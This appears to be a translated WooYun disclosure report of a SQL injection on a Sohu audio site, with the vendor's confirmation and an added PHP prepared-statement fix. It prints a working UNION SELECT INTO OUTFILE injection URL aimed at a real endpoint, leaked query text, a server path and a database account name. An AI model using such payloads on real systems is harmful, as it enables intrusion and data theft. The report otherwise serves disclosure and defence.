Vulnerability summary

Defect ID: wooyun-2013-025506

Title: SQL injection in a Sohu channel

Vendor: Sohu (搜狐)

Author: 逆雪寒

Submitted: 2013-06-09 10:29

Fix deadline: 2013-07-24 10:29

Public disclosure: 2013-07-24 10:29

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-06-09: Details sent to the vendor, awaiting the vendor's response
2013-06-09: Vendor confirmed; details disclosed to the vendor only
2013-06-19: Details disclosed to core white hats and experts in the relevant field
2013-06-29: Details disclosed to regular white hats
2013-07-09: Details disclosed to intern white hats
2013-07-24: Details disclosed to the public

Brief description:

SQL injection ~~ the same old problem..

Detailed description:

I came across this URL: http://ting.sohu.com/send/sending_setcookie.php?cpcode=asdf
The name looks like "set cookie" ... out of habit.. I added a single ' and got the following:
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdf'' and t1.product_name=t2.product_name' at line 1 on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql select t1.audio_url,t2.product_name,t1.sub_product_name,t2.product_id,t1.theorder,t1.sub_product_id from t_sub_product t1,t_product t2 where t1.sub_product_id='asdf'' and t1.product_name=t2.product_name
Wow, the path is disclosed ~~ and the SQL is clearly influenced by external input.. an injection is born just like that.
Time to bring out the tools...
Finally I also tried outfile ...
http://ting.sohu.com/send/balance_user.php?userid_comm=d'%20and%20t1.user_id=t2.user_id%20%20%20union%20all%20select%20%22xxddoo%22,2,3%20INTO%20OUTFILE%20%22/mfs/wwwroot/ting/send/nixuehan.html%22--%20'
The result:
Error 1045: Access denied for user 'wcms_tsw'@'192.168.%' (using password: YES) on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql SELECT t1.thevalue,t1.user_type,t1.thedate from t_user_info t1,t_user t2 where t2.user_name='d' and t1.user_id=t2.user_id union all select "xxddoo",2,3 INTO OUTFILE "/mfs/wwwroot/ting/send/nixuehan.html"-- '' and t1.user_id=t2.user_id
Not bad ~~ no FILE privilege.. that part was done well.. otherwise it might have been possible to get a shell..
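As an added defensive illustration (not part of the original report and not Sohu's code): the query leaked in the first error message above, rebuilt in PHP with a mysqli prepared statement so the cpcode value is bound as data rather than spliced into the SQL, and with driver errors logged server-side instead of echoed with the query text and script path. The function name, the connection parameters and the "vulnerable pattern" comment are assumptions reconstructed from the error message, not the site's actual source.

```php
<?php
// Vulnerable pattern (reconstructed from the error message, not the real source):
//   $sql = "... where t1.sub_product_id='" . $_GET['cpcode'] . "' and ...";
// A single quote in cpcode terminates the literal and becomes part of the statement.

function lookup_sub_product(mysqli $db, string $cpcode): ?array
{
    // Same tables and columns as the leaked query; the user value is a placeholder.
    $sql = 'SELECT t1.audio_url, t2.product_name, t1.sub_product_name,'
         . ' t2.product_id, t1.theorder, t1.sub_product_id'
         . ' FROM t_sub_product t1, t_product t2'
         . ' WHERE t1.sub_product_id = ? AND t1.product_name = t2.product_name';

    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        // Log the driver error internally; never send $db->error, the SQL text or the
        // script path to the client, which is what disclosed the query and the
        // /mfs/wwwroot path in the report above.
        error_log('prepare failed: ' . $db->error);
        return null;
    }
    // The value travels separately from the statement text, so a quote in it is just data.
    $stmt->bind_param('s', $cpcode);
    if (!$stmt->execute()) {
        error_log('execute failed: ' . $stmt->error);
        return null;
    }
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage; host, account and password are placeholders.
mysqli_report(MYSQLI_REPORT_OFF);   // no exceptions or warnings leaking into the HTTP response
$db = new mysqli('db-host', 'app_user', 'app_password', 'tsw');
$cpcode = (string) ($_GET['cpcode'] ?? '');
$row = lookup_sub_product($db, $cpcode);
if ($row === null) {
    http_response_code(404);
    exit('not found');
}
header('Content-Type: application/json');
echo json_encode($row);
```

The report's second observation, that the application account had no FILE privilege, is the complementary control: keep the database user limited to the SELECT/INSERT/UPDATE it needs so a remaining injection cannot write files or read other schemas.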

Proof of vulnerability:

Database: tsw
[101 tables]

Fix recommendation:

Sohu's developers know better than I do.

Copyright notice: when reposting, please credit the source: 逆雪寒@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-06-09 10:59

Vendor reply:

Thank you for your attention to Sohu's security.

Latest status:

None yet

